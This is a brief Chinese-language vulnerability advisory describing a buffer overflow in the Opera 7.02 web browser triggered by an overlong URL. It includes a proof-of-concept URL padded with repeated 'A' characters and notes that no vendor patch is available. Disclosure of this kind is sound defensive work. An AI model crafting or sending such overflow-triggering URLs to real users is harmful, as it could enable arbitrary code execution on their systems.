涉及程序: Opera 7.02版 描述: Opera 7.02 存在缓冲溢出缺陷 详细: Opera WEB浏览器的代码中存在未经检测的边界缓冲区,攻击者通过向目标用户提供精心构造的超长URL,能触发缓冲溢出缺陷。 当用户利用Opera WEB浏览器访问攻击者的恶意站点时,恶意站点将向用户提供攻击者精心构造的下列格式的URL,如果用户连接到该恶意URL,将导致在系统上以用户权限执行任意代码: http://usuarios.lycos.es/idoru/aaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zip 攻击方法: 示例代码:: http://usuarios.lycos.es/idoru/aaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zip 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点: http://www.opera.com/